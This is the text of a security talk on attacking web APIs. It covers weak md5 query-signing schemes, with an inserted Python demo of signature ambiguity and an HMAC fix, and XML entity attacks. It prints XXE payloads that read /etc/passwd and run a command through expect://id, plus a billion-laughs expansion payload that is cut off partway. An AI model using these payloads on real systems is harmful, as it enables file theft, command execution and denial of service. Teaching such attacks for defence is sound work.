© 2002—2014, Digital Security
• Senior Security Auditor at Digital Security
• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, Xakep magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013
• Speaker: CodeFest 2012, ZeroNights 0x03
What are we talking about?
Hacking via API
What should we test?
• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering
Developing
42 Kb…
…10 Gb?
…100 Gb?
Say HELLO to
The evil of JavaScript and
Query signing
Sign = sha*(…+DATA+…)
Say hello again.
A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
What does the attacker know?
• Original data
• Sign (token)
What does the attacker want?
Can sign new query without API key!
Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU: sig = md5(uid + params + private_key)
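The reuse the slide describes, spelled out as an added example (not the deck's own code and not any provider's real implementation): with the delimiter-free name1=value1name2=value2 concatenation from the VK formula, two different parameter sets can produce the same signed string, so a signature captured for one request verifies for the other. The hardened signer below uses HMAC-SHA256 over a URL-encoded canonical form instead. The secret, parameter names and values are constructed for the demo.

```python
import hashlib
import hmac
from urllib.parse import urlencode

# Constructed demo secret; not a real key.
API_SECRET = "demo-secret-0123"


def weak_sig(params: dict, secret: str = API_SECRET) -> str:
    """Scheme of the shape shown on the slide:
    md5(name1=value1name2=value2... + api_secret).
    Parameters are sorted by name and concatenated with no delimiter,
    so the hashed string does not uniquely identify the parameter set."""
    joined = "".join(f"{k}={v}" for k, v in sorted(params.items()))
    return hashlib.md5((joined + secret).encode()).hexdigest()


def strong_sig(params: dict, secret: str = API_SECRET) -> str:
    """Hardened form: names and values are URL-escaped and '&'-separated
    (unambiguous bytes), and the secret is an HMAC key rather than a
    substring of the hashed message."""
    canonical = urlencode(sorted(params.items()))
    return hmac.new(secret.encode(), canonical.encode(), hashlib.sha256).hexdigest()


def verify(params: dict, sig: str, signer, secret: str = API_SECRET) -> bool:
    """Server-side check: constant-time comparison of the recomputed signature."""
    return hmac.compare_digest(signer(params, secret), sig)


# Constructed sample requests. The signer only ever signed `legit`.
legit = {"method": "getProfile", "uid": "42", "fields": "name"}
# After sorting and concatenating, both collapse to the same string:
#   "fields=namemethod=getProfileuid=42"
other = {"fields": "namemethod=getProfile", "uid": "42"}


def weak_scheme_is_ambiguous() -> bool:
    """True if the delimiter-free scheme gives both requests one signature."""
    return weak_sig(legit) == weak_sig(other)


def strong_scheme_is_ambiguous() -> bool:
    """False for the canonical HMAC scheme: the two requests sign differently."""
    return strong_sig(legit) == strong_sig(other)
```

The same check (sign two structurally different requests and compare) is a quick review test for any concatenation-based signing scheme.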
Request hijacking…
DTD Example:
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">
XML example:
XML entities?
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">